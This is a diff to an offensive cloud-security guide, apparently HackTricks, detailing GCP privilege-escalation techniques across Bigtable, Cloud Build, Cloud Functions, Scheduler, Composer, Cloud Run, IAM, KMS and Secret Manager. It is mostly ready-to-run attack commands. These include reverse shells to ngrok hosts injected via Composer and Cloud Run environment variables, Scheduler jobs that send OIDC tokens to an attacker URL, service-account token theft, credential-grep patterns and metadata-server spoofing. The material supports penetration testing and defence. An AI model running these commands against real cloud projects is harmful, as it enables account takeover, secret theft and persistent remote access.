<details><summary>Grant yourself bigtable.admin role on table</summary>
```bash
gcloud bigtable tables add-iam-policy-binding <table-id> \
--instance=<instance-id> \
@@ -40,6 +46,8 @@ gcloud bigtable tables add-iam-policy-binding <table-id> \
--role='roles/bigtable.admin'
```
</details>
After having this permission check in the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) techniques for more ways to abuse Bigtable permissions.
@@ -51,6 +59,8 @@ Backups can be restored to **any instance in any project** you control. First, g
If you have the permission `bigtable.backups.setIamPolicy` you could grant yourself the permission `bigtable.backups.restore` to restore old backups and try to access sensitiv information.
<details><summary>Take ownership of backup snapshot</summary>
```bash
# Take ownership of the snapshot
gcloud bigtable backups add-iam-policy-binding <backup-id> \
@@ -59,6 +69,8 @@ gcloud bigtable backups add-iam-policy-binding <backup-id> \
--role='roles/bigtable.admin'
```
</details>
After having this permission check in the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) to check how to restore a backup.
@@ -68,6 +80,8 @@ After having this permission check in the [**Bigtable Post Exploitation section*
Authorized Views are supposed to redact rows/columns. Modifying or deleting them **removes the fine-grained guardrails** that defenders rely on.
<details><summary>Update authorized view to broaden access</summary>
```bash
# Broaden the subset by uploading a permissive definition
gcloud bigtable authorized-views update <view-id> \
@@ -93,6 +107,8 @@ gcloud bigtable authorized-views describe <view-id> \
--instance=<instance-id> --table=<table-id>
```
</details>
After having this permission check in the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) to check how to read from an authorized view.
### `bigtable.authorizedViews.setIamPolicy`
@@ -101,6 +117,8 @@ After having this permission check in the [**Bigtable Post Exploitation section*
An attacker with this permission can grant themselves access to an Authorized View, which may contain sensitive data that they would not otherwise have access to.
<details><summary>Grant yourself access to authorized view</summary>
```bash
# Give more permissions over an existing view
gcloud bigtable authorized-views add-iam-policy-binding <view-id> \
@@ -109,6 +127,8 @@ gcloud bigtable authorized-views add-iam-policy-binding <view-id> \
--role='roles/bigtable.viewer'
```
</details>
After having this permission check in the [**Bigtable Post Exploitation section**](../gcp-post-exploitation/gcp-bigtable-post-exploitation.md) to check how to read from an authorized view.

View File

@@ -15,6 +15,8 @@
- `clientauthconfig.clients.delete`
- `clientauthconfig.clients.update`
<details><summary>Create OAuth brand and client</summary>
```bash
# Create a brand
gcloud iap oauth-brands list
@@ -23,6 +25,8 @@ gcloud iap oauth-brands create --application_title=APPLICATION_TITLE --support_e
gcloud iap oauth-clients create projects/PROJECT_NUMBER/brands/BRAND-ID --display_name=NAME
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -18,6 +18,9 @@ Therefore, you can just make the machine exfiltrate to your server the token or
#### Direct exploitation via gcloud CLI
1- Create `cloudbuild.yaml` and modify with your listener data
<details><summary>Cloud Build YAML configuration for reverse shell</summary>
```yaml
steps:
- name: bash
@@ -27,11 +30,19 @@ steps:
options:
logging: CLOUD_LOGGING_ONLY
```
</details>
2- Upload a simple build with no source, the yaml file and specify the SA to use on the build:
<details><summary>Submit Cloud Build with specified service account</summary>
```bash
gcloud builds submit --no-source --config="./cloudbuild.yaml" --service-account="projects/<PROJECT>/serviceAccounts/<SERVICE_ACCOUNT_ID>@<PROJECT_ID>.iam.gserviceaccount.com
```
</details>
#### Using python gcloud library
You can find the original exploit script [**here on GitHub**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/cloudbuild.builds.create.py) (but the location it's taking the token from didn't work for me). Therefore, check a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.sh) and a python script to get a reverse shell inside the cloudbuild machine and [**steal it here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/f-cloudbuild.builds.create.py) (in the code you can find how to specify other service accounts)**.**
@@ -42,6 +53,8 @@ For a more in-depth explanation, visit [https://rhinosecuritylabs.com/gcp/iam-pr
With this permission the user can get the **read access token** used to access the repository:
<details><summary>Get read access token for repository</summary>
```bash
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
@@ -50,10 +63,14 @@ curl -X POST \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>/repositories/<repo-id>:accessReadToken"
```
</details>
### `cloudbuild.repositories.accessReadWriteToken`
With this permission the user can get the **read and write access token** used to access the repository:
<details><summary>Get read and write access token for repository</summary>
```bash
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
@@ -62,16 +79,22 @@ curl -X POST \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>/repositories/<repo-id>:accessReadWriteToken"
```
</details>
### `cloudbuild.connections.fetchLinkableRepositories`
With this permission you can **get the repos the connection has access to:**
<details><summary>Fetch linkable repositories</summary>
```bash
curl -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://cloudbuild.googleapis.com/v2/projects/<PROJECT_ID>/locations/<LOCATION>/connections/<CONN_ID>:fetchLinkableRepositories"
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -26,6 +26,8 @@ An attacker with these privileges can **modify the code of a Function and even m
Some extra privileges like `.call` permission for version 1 cloudfunctions or the role `role/run.invoker` to trigger the function might be required.
<details><summary>Update Cloud Function with malicious code to exfiltrate service account token</summary>
```bash
# Create new code
temp_dir=$(mktemp -d)
@@ -56,6 +58,8 @@ gcloud functions deploy <cloudfunction-name> \
gcloud functions call <cloudfunction-name>
```
</details>
> [!CAUTION]
> If you get the error `Permission 'run.services.setIamPolicy' denied on resource...` is because you are using the `--allow-unauthenticated` param and you don't have enough permissions for it.
@@ -65,6 +69,8 @@ The exploit script for this method can be found [here](https://github.com/RhinoS
With this permission you can get a **signed URL to be able to upload a file to a function bucket (but the code of the function won't be changed, you still need to update it)**
<details><summary>Generate signed upload URL for Cloud Function</summary>
```bash
# Generate the URL
curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions:generateUploadUrl \
@@ -73,6 +79,8 @@ curl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/loca
-d '{}'
```
</details>
Not really sure how useful only this permission is from an attackers perspective, but good to know.
### `cloudfunctions.functions.setIamPolicy` , `iam.serviceAccounts.actAs`

View File

@@ -14,15 +14,21 @@ For more information about the cloudidentity service, check this page:
If your user has enough permissions or the group is misconfigured, he might be able to make himself a member of a new group:
<details><summary>Add yourself to a Cloud Identity group</summary>
```bash
gcloud identity groups memberships add --group-email <email> --member-email <email> [--roles OWNER]
# If --roles isn't specified you will get MEMBER
```
</details>
### Modify group membership
If your user has enough permissions or the group is misconfigured, he might be able to make himself OWNER of a group he is a member of:
<details><summary>Modify group membership to become OWNER</summary>
```bash
# Check the current membership level
gcloud identity groups memberships describe --member-email <email> --group-email <email>
@@ -31,6 +37,8 @@ gcloud identity groups memberships describe --member-email <email> --group-email
gcloud identity groups memberships modify-membership-roles --group-email <email> --member-email <email> --add-roles=OWNER
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -18,34 +18,48 @@ An attacker with these permissions could exploit **Cloud Scheduler** to **authen
Create a new Storage bucket:
<details><summary>Create Cloud Scheduler job to create GCS bucket via API</summary>
```bash
gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://storage.googleapis.com/storage/v1/b?project=<PROJECT-ID>' --message-body "{'name':'new-bucket-name'}" --oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com --headers "Content-Type=application/json" --location us-central1
```
</details>
To escalate privileges, an **attacker merely crafts an HTTP request targeting the desired API, impersonating the specified Service Account**
- **Exfiltrate OIDC service account token**
<details><summary>Create Cloud Scheduler job to exfiltrate OIDC token</summary>
```bash
gcloud scheduler jobs create http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience '...']
# Listen in the ngrok address to get the OIDC token in clear text.
```
</details>
If you need to check the HTTP response you might just t**ake a look at the logs of the execution**.
### `cloudscheduler.jobs.update` , `iam.serviceAccounts.actAs`, (`cloudscheduler.locations.list`)
Like in the previous scenario it's possible to **update an already created scheduler** to steal the token or perform actions. For example:
<details><summary>Update existing Cloud Scheduler job to exfiltrate OIDC token</summary>
```bash
gcloud scheduler jobs update http test --schedule='* * * * *' --uri='https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience '...']
# Listen in the ngrok address to get the OIDC token in clear text.
```
</details>
Another example to upload a private key to a SA and impersonate it:
<details><summary>Upload private key to Service Account via Cloud Scheduler and impersonate it</summary>
```bash
# Generate local private key
openssl req -x509 -nodes -newkey rsa:2048 -days 365 \
@@ -110,6 +124,8 @@ EOF
gcloud auth activate-service-account --key-file=/tmp/lab.json
```
</details>
## References
- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)

View File

@@ -8,6 +8,8 @@
An attacker with these permissions can **impersonate other service accounts** by creating tasks that execute with the specified service account's identity. This allows sending **authenticated HTTP requests to IAM-protected Cloud Run or Cloud Functions** services.
<details><summary>Create Cloud Task with service account impersonation</summary>
```bash
gcloud tasks create-http-task \
task-$(date '+%Y%m%d%H%M%S') \
@@ -20,20 +22,28 @@ gcloud tasks create-http-task \
--oidc-service-account-email <account>@<project_id>.iam.gserviceaccount.com
```
</details>
### `cloudtasks.tasks.run`, `cloudtasks.tasks.list`
An attacker with these permissions can **run existing scheduled tasks** without having permissions on the service account associated with the task. This allows executing tasks that were previously created with higher privileged service accounts.
<details><summary>Run existing Cloud Task without actAs permission</summary>
```bash
gcloud tasks run projects/<project_id>/locations/us-central1/queues/<queue_name>/tasks/<task_id>
```
</details>
The principal executing this command **doesn't need `iam.serviceAccounts.actAs` permission** on the task's service account. However, this only allows running existing tasks - it doesn't grant the ability to create or modify tasks.
### `cloudtasks.queues.setIamPolicy`
An attacker with this permission can **grant themselves or other principals Cloud Tasks roles** on specific queues, potentially escalating to `roles/cloudtasks.admin` which includes the ability to create and run tasks.
<details><summary>Grant Cloud Tasks admin role on queue</summary>
```bash
gcloud tasks queues add-iam-policy-binding \
<queue_name> \
@@ -42,6 +52,8 @@ gcloud tasks queues add-iam-policy-binding \
--role roles/cloudtasks.admin
```
</details>
This allows the attacker to grant full Cloud Tasks admin permissions on the queue to any service account they control.
## References

View File

@@ -14,6 +14,8 @@ More info in:
It's possible to **attach any service account** to the newly create composer environment with that permission. Later you could execute code inside composer to steal the service account token.
<details><summary>Create Composer environment with attached service account</summary>
```bash
gcloud composer environments create privesc-test \
--project "${PROJECT_ID}" \
@@ -21,12 +23,16 @@ gcloud composer environments create privesc-test \
--service-account="${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com"
```
</details>
More info about the exploitation [**here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/i-composer.environmets.create.sh).
### `composer.environments.update`
It's possible to update composer environment, for example, modifying env variables:
<details><summary>Update Composer environment variables for code execution</summary>
```bash
# Even if it says you don't have enough permissions the update happens
gcloud composer environments update \
@@ -50,29 +56,41 @@ X-Allowed-Locations: 0x0
{"config": {"softwareConfig": {"envVariables": {"BROWSER": "/bin/bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/1890 0>&1' & #%s", "PYTHONWARNINGS": "all:0:antigravity.x:0:0"}}}}
```
</details>
TODO: Get RCE by adding new pypi packages to the environment
### Download Dags
Check the source code of the dags being executed:
<details><summary>Export and download DAGs from Composer environment</summary>
```bash
mkdir /tmp/dags
gcloud composer environments storage dags export --environment <environment> --location <loc> --destination /tmp/dags
```
</details>
### Import Dags
Add the python DAG code into a file and import it running:
<details><summary>Import malicious DAG into Composer environment</summary>
```bash
# TODO: Create dag to get a rev shell
gcloud composer environments storage dags import --environment test --location us-central1 --source /tmp/dags/reverse_shell.py
```
</details>
Reverse shell DAG:
```python:reverse_shell.py
<details><summary>Python DAG code for reverse shell</summary>
```python
import airflow
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
@@ -104,6 +122,8 @@ t1 = BashOperator(
do_xcom_push=False)
```
</details>
### Write Access to the Composer bucket
All the components of a composer environments (DAGs, plugins and data) are stores inside a GCP bucket. If the attacker has read and write permissions over it, he could monitor the bucket and **whenever a DAG is created or updated, submit a backdoored version** so the composer environment will get from the storage the backdoored version.

View File

@@ -8,10 +8,14 @@
This permission allows to **gather credentials for the Kubernetes cluster** using something like:
<details><summary>Get Kubernetes cluster credentials</summary>
```bash
gcloud container clusters get-credentials <cluster_name> --zone <zone>
```
</details>
Without extra permissions, the credentials are pretty basic as you can **just list some resource**, but hey are useful to find miss-configurations in the environment.
> [!NOTE]
@@ -19,6 +23,8 @@ Without extra permissions, the credentials are pretty basic as you can **just li
If you don't have this permission you can still access the cluster, but you need to **create your own kubectl config file** with the clusters info. A new generated one looks like this:
<details><summary>Example kubectl config file for GKE cluster</summary>
```yaml
apiVersion: v1
clusters:
@@ -48,6 +54,8 @@ users:
name: gcp
```
</details>
### `container.roles.escalate` | `container.clusterRoles.escalate`
**Kubernetes** by default **prevents** principals from being able to **create** or **update** **Roles** and **ClusterRoles** with **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update Roles/ClusterRoles with more permissions** that ones he held, effectively bypassing the Kubernetes protection against this behaviour.

View File

@@ -22,6 +22,8 @@ I was unable to get a reverse shell using this method, however it is possible to
- Leak the service account token used by the cluster.
<details><summary>Python script to fetch SA token from metadata server</summary>
```python
import requests
@@ -43,6 +45,10 @@ if __name__ == "__main__":
fetch_metadata_token()
```
</details>
<details><summary>Submit malicious job to Dataproc cluster</summary>
```bash
# Copy the script to the storage bucket
gsutil cp <python-script> gs://<bucket-name>/<python-script>
@@ -53,4 +59,6 @@ gcloud dataproc jobs submit pyspark gs://<bucket-name>/<python-script> \
--region=<region>
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -14,33 +14,45 @@ Find more information about IAM in:
An attacker with the mentioned permissions will be able to update a role assigned to you and give you extra permissions to other resources like:
<details><summary>Update IAM role to add permissions</summary>
```bash
gcloud iam roles update <rol name> --project <project> --add-permissions <permission>
```
</details>
You can find a script to automate the **creation, exploit and cleaning of a vuln environment here** and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.roles.update.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
### `iam.serviceAccounts.getAccessToken` (`iam.serviceAccounts.get`)
An attacker with the mentioned permissions will be able to **request an access token that belongs to a Service Account**, so it's possible to request an access token of a Service Account with more privileges than ours.
<details><summary>Impersonate service account to get access token</summary>
```bash
gcloud --impersonate-service-account="${victim}@${PROJECT_ID}.iam.gserviceaccount.com" \
auth print-access-token
```
</details>
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/4-iam.serviceAccounts.getAccessToken.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.getAccessToken.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
### `iam.serviceAccountKeys.create`
An attacker with the mentioned permissions will be able to **create a user-managed key for a Service Account**, which will allow us to access GCP as that Service Account.
<details><summary>Create service account key and authenticate</summary>
```bash
gcloud iam service-accounts keys create --iam-account <name> /tmp/key.json
gcloud auth activate-service-account --key-file=sa_cred.json
```
</details>
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/3-iam.serviceAccountKeys.create.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccountKeys.create.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
Note that **`iam.serviceAccountKeys.update` won't work to modify the key** of a SA because to do that the permissions `iam.serviceAccountKeys.create` is also needed.
@@ -53,6 +65,8 @@ If you have the **`iam.serviceAccounts.implicitDelegation`** permission on a Ser
Note that according to the [**documentation**](https://cloud.google.com/iam/docs/understanding-service-accounts), the delegation of `gcloud` only works to generate a token using the [**generateAccessToken()**](https://cloud.google.com/iam/credentials/reference/rest/v1/projects.serviceAccounts/generateAccessToken) method. So here you have how to get a token using the API directly:
<details><summary>Generate access token with delegation using API</summary>
```bash
curl -X POST \
'https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/'"${TARGET_SERVICE_ACCOUNT}"':generateAccessToken' \
@@ -64,6 +78,8 @@ curl -X POST \
}'
```
</details>
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/5-iam.serviceAccounts.implicitDelegation.sh) and a python script to abuse this privilege [**here**](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/iam.serviceAccounts.implicitDelegation.py). For more information check the [**original research**](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/).
### `iam.serviceAccounts.signBlob`
@@ -82,6 +98,8 @@ You can find a script to automate the [**creation, exploit and cleaning of a vul
An attacker with the mentioned permissions will be able to **add IAM policies to service accounts**. You can abuse it to **grant yourself** the permissions you need to impersonate the service account. In the following example we are granting ourselves the `roles/iam.serviceAccountTokenCreator` role over the interesting SA:
<details><summary>Add IAM policy binding to service account</summary>
```bash
gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.iam.gserviceaccount.com" \
--member="user:username@domain.com" \
@@ -93,6 +111,8 @@ gcloud iam service-accounts add-iam-policy-binding "${VICTIM_SA}@${PROJECT_ID}.i
--role="roles/iam.serviceAccountUser"
```
</details>
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/d-iam.serviceAccounts.setIamPolicy.sh)**.**
### `iam.serviceAccounts.actAs`
@@ -115,6 +135,8 @@ According to this [**interesting post**](https://medium.com/google-cloud/authent
You can generate an OpenIDToken (if you have the access) with:
<details><summary>Generate OpenID token for service account</summary>
```bash
# First activate the SA with iam.serviceAccounts.getOpenIdToken over the other SA
gcloud auth activate-service-account --key-file=/path/to/svc_account.json
@@ -122,12 +144,18 @@ gcloud auth activate-service-account --key-file=/path/to/svc_account.json
gcloud auth print-identity-token "${ATTACK_SA}@${PROJECT_ID}.iam.gserviceaccount.com" --audiences=https://example.com
```
</details>
Then you can just use it to access the service with:
<details><summary>Use OpenID token to authenticate</summary>
```bash
curl -v -H "Authorization: Bearer id_token" https://some-cloud-run-uc.a.run.app
```
</details>
Some services that support authentication via this kind of tokens are:
- [Google Cloud Run](https://cloud.google.com/run/)

View File

@@ -16,6 +16,8 @@ Note that in KMS the **permission** are not only **inherited** from Orgs, Folder
You can use this permission to **decrypt information with the key** you have this permission over.
<details><summary>Decrypt data using KMS key</summary>
```bash
gcloud kms decrypt \
--location=[LOCATION] \
@@ -26,10 +28,14 @@ gcloud kms decrypt \
--plaintext-file=[DECRYPTED_FILE_PATH]
```
</details>
### `cloudkms.cryptoKeys.setIamPolicy`
An attacker with this permission could **give himself permissions** to use the key to decrypt information.
<details><summary>Grant yourself KMS decrypter role</summary>
```bash
gcloud kms keys add-iam-policy-binding [KEY_NAME] \
--location [LOCATION] \
@@ -38,6 +44,8 @@ gcloud kms keys add-iam-policy-binding [KEY_NAME] \
--role roles/cloudkms.cryptoKeyDecrypter
```
</details>
### `cloudkms.cryptoKeyVersions.useToDecryptViaDelegation`
Here's a conceptual breakdown of how this delegation works:
@@ -53,6 +61,8 @@ When you make a standard decryption request using the Google Cloud KMS API (in P
1. **Define the Custom Role**: Create a YAML file (e.g., `custom_role.yaml`) that defines the custom role. This file should include the `cloudkms.cryptoKeyVersions.useToDecryptViaDelegation` permission. Here's an example of what this file might look like:
<details><summary>Custom role YAML definition</summary>
```yaml
title: "KMS Decryption via Delegation"
description: "Allows decryption via delegation"
@@ -61,16 +71,24 @@ includedPermissions:
- "cloudkms.cryptoKeyVersions.useToDecryptViaDelegation"
```
</details>
2. **Create the Custom Role Using the gcloud CLI**: Use the following command to create the custom role in your Google Cloud project:
<details><summary>Create custom KMS role</summary>
```bash
gcloud iam roles create kms_decryptor_via_delegation --project [YOUR_PROJECT_ID] --file custom_role.yaml
```
Replace `[YOUR_PROJECT_ID]` with your Google Cloud project ID.
</details>
3. **Grant the Custom Role to a Service Account**: Assign your custom role to a service account that will be using this permission. Use the following command:
<details><summary>Grant custom role to service account</summary>
```bash
# Give this permission to the service account to impersonate
gcloud projects add-iam-policy-binding [PROJECT_ID] \
@@ -85,6 +103,8 @@ gcloud projects add-iam-policy-binding [YOUR_PROJECT_ID] \
Replace `[YOUR_PROJECT_ID]` and `[SERVICE_ACCOUNT_EMAIL]` with your project ID and the email of the service account, respectively.
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -46,10 +46,14 @@ Check the following permissions:
Check if other users have loggedin in gcloud inside the box and left their credentials in the filesystem:
<details><summary>Search for gcloud credentials in filesystem</summary>
```
sudo find / -name "gcloud"
```
</details>
These are the most interesting files:
- `~/.config/gcloud/credentials.db`
@@ -59,6 +63,8 @@ These are the most interesting files:
### More API Keys regexes
<details><summary>Grep patterns for GCP credentials and keys</summary>
```bash
TARGET_DIR="/path/to/whatever"
@@ -91,6 +97,8 @@ grep -Pzr '(?s)<form action.*?googleapis.com.*?name="signature" value=".*?">' \
"$TARGET_DIR"
```
</details>
## References
- [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/)

View File

@@ -30,22 +30,37 @@ To execute the spoofing, the following steps are necessary:
1. **Monitor requests to the Metadata server** using **tcpdump**:
<details>
<summary>Monitor metadata server requests with tcpdump</summary>
```bash
tcpdump -S -i eth0 'host 169.254.169.254 and port 80' &
```
</details>
Look for a line similar to:
<details>
<summary>Example tcpdump output line</summary>
```
<TIME> IP <LOCAL_IP>.<PORT> > 169.254.169.254.80: Flags [P.], seq <NUM>:<TARGET_ACK>, ack <TARGET_SEQ>, win <NUM>, length <NUM>: HTTP: GET /computeMetadata/v1/?timeout_sec=<SECONDS>&last_etag=<ETAG>&alt=json&recursive=True&wait_for_change=True HTTP/1.1
```
</details>
2. Send the fake metadata data with the correct ETAG to rshijack:
<details>
<summary>Send fake metadata and SSH to host</summary>
```bash
fakeData.sh <ETAG> | rshijack -q eth0 169.254.169.254:80 <LOCAL_IP>:<PORT> <TARGET_SEQ> <TARGET_ACK>; ssh -i id_rsa -o StrictHostKeyChecking=no wouter@localhost
```
</details>
This step authorizes the public key, enabling SSH connection with the corresponding private key.
## References

View File

@@ -8,6 +8,9 @@
An attacker leveraging **orgpolicy.policy.set** can manipulate organizational policies, which will allow him to remove certain restrictions impeding specific operations. For instance, the constraint **appengine.disableCodeDownload** usually blocks downloading of App Engine source code. However, by using **orgpolicy.policy.set**, an attacker can deactivate this constraint, thereby gaining access to download the source code, despite it initially being protected.
<details>
<summary>Get org policy info and disable enforcement</summary>
```bash
# Get info
gcloud resource-manager org-policies describe <org-policy> [--folder <id> | --organization <id> | --project <id>]
@@ -16,6 +19,8 @@ gcloud resource-manager org-policies describe <org-policy> [--folder <id> | --or
gcloud resource-manager org-policies disable-enforce <org-policy> [--folder <id> | --organization <id> | --project <id>]
```
</details>
A python script for this method can be found [here](https://github.com/RhinoSecurityLabs/GCP-IAM-Privilege-Escalation/blob/master/ExploitScripts/orgpolicy.policy.set.py).
### `orgpolicy.policy.set`, `iam.serviceAccounts.actAs`
@@ -24,6 +29,9 @@ uusally it's not possible to attach a service account from a different project t
It's possible to verify if this constraint is enforced by running the following command:
<details>
<summary>Verify cross-project service account constraint</summary>
```bash
gcloud resource-manager org-policies describe \
constraints/iam.disableCrossProjectServiceAccountUsage \
@@ -35,16 +43,23 @@ booleanPolicy:
constraint: constraints/iam.disableCrossProjectServiceAccountUsage
```
</details>
This prevents an attacker from abusing the permission **`iam.serviceAccounts.actAs`** to impersonate a service account from another project without needed further infra permissions to start a new VM for example, which could lead to privilege escalation.
However, an attacker with the permissions **`orgpolicy.policy.set`** can bypass this restriction by disabling the constraint **`iam.disableServiceAccountProjectWideAccess`**. This allows the attacker to attach a service account from another project to a resource in his own project, effectively escalating his privileges.
<details>
<summary>Disable cross-project service account constraint</summary>
```bash
gcloud resource-manager org-policies disable-enforce \
iam.disableCrossProjectServiceAccountUsage \
--project=<project-id>
```
</details>
## References
- [https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/](https://rhinosecuritylabs.com/cloud-security/privilege-escalation-google-cloud-platform-part-2/)

View File

@@ -22,6 +22,9 @@ Note that when using `gcloud run deploy` instead of just creating the service **
Like the previous one but updating a service:
<details>
<summary>Deploy Cloud Run service with reverse shell</summary>
```bash
# Launch some web server to listen in port 80 so the service works
echo "python3 -m http.server 80;sh -i >& /dev/tcp/0.tcp.eu.ngrok.io/14348 0>&1" | base64
@@ -38,6 +41,8 @@ gcloud run deploy hacked \
# If you don't have permissions to use "--allow-unauthenticated", dont use it
```
</details>
### `run.services.setIamPolicy`
Give yourself previous permissions over cloud Run.
@@ -46,6 +51,9 @@ Give yourself previous permissions over cloud Run.
Launch a job with a reverse shell to steal the service account indicated in the command. You can find an [**exploit here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/m-run.jobs.create.sh).
<details>
<summary>Create Cloud Run job with reverse shell</summary>
```bash
gcloud beta run jobs create jab-cloudrun-3326 \
--image=ubuntu:latest \
@@ -56,10 +64,15 @@ gcloud beta run jobs create jab-cloudrun-3326 \
```
</details>
### `run.jobs.update`,`run.jobs.run`,`iam.serviceaccounts.actAs`,(`run.jobs.get`)
Similar to the previous one it's possible to **update a job and update the SA**, the **command** and **execute it**:
<details>
<summary>Update Cloud Run job and execute with reverse shell</summary>
```bash
gcloud beta run jobs update hacked \
--image=mubuntu:latest \
@@ -70,6 +83,8 @@ gcloud beta run jobs update hacked \
--execute-now
```
</details>
### `run.jobs.setIamPolicy`
Give yourself the previous permissions over Cloud Jobs.
@@ -78,10 +93,15 @@ Give yourself the previous permissions over Cloud Jobs.
Abuse the env variables of a job execution to execute arbitrary code and get a reverse shell to dump the contents of the container (source code) and access the SA inside the metadata:
<details>
<summary>Execute Cloud Run job with environment variable exploitation</summary>
```bash
gcloud beta run jobs execute job-name --region <region> --update-env-vars="PYTHONWARNINGS=all:0:antigravity.x:0:0,BROWSER=/bin/bash -c 'bash -i >& /dev/tcp/6.tcp.eu.ngrok.io/14195 0>&1' #%s"
```
</details>
## References
- [https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/](https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/)

View File

@@ -14,11 +14,15 @@ For more information about secretmanager:
This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret):
<details><summary>Get clear-text secret version</summary>
```bash
# Get clear-text of version 1 of secret: "<secret name>"
gcloud secrets versions access 1 --secret="<secret_name>"
```
</details>
As this is also a post exploitation technique it can be found in:
{{#ref}}
@@ -29,12 +33,16 @@ As this is also a post exploitation technique it can be found in:
This give you access to give you access to read the secrets from the secret manager, like using:
<details><summary>Add IAM policy binding to secret</summary>
```bash
gcloud secrets add-iam-policy-binding <scret-name> \
--member="serviceAccount:<sa-name>@$PROJECT_ID.iam.gserviceaccount.com" \
--role="roles/secretmanager.secretAccessor"
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -18,18 +18,26 @@ gcp-apikeys-privesc.md
An undocumented API was found that can be used to **create API keys:**
<details><summary>Create API key using undocumented API</summary>
```bash
curl -XPOST "https://apikeys.clients6.google.com/v1/projects/<project-uniq-name>/apiKeys?access_token=$(gcloud auth print-access-token)"
```
</details>
### `serviceusage.apiKeys.list`
Another undocumented API was found for listing API keys that have already been created (the API keys appears in the response):
<details><summary>List API keys using undocumented API</summary>
```bash
curl "https://apikeys.clients6.google.com/v1/projects/<project-uniq-name>/apiKeys?access_token=$(gcloud auth print-access-token)"
```
</details>
### **`serviceusage.services.enable`** , **`serviceusage.services.use`**
With these permissions an attacker can enable and use new services in the project. This could allow an **attacker to enable service like admin or cloudidentity** to try to access Workspace information, or other services to access interesting data.

View File

@@ -14,10 +14,14 @@ For more information about Source Repositories check:
With this permission it's possible to download the repository locally:
<details><summary>Clone source repository</summary>
```bash
gcloud source repos clone <repo-name> --project=<project-uniq-name>
```
</details>
### `source.repos.update`
A principal with this permission **will be able to write code inside a repository cloned with `gcloud source repos clone <repo>`**. But note that this permission cannot be attached to custom roles, so it must be given via a predefined role like:
@@ -47,10 +51,14 @@ It's possible to **add ssh keys to the Source Repository project** in the web co
Once your ssh key is set, you can access a repo with:
<details><summary>Clone repository using SSH</summary>
```bash
git clone ssh://username@domain.com@source.developers.google.com:2022/p/<proj-name>/r/<repo-name>
```
</details>
And then use **`git`** commands are per usual.
### Manual Credentials
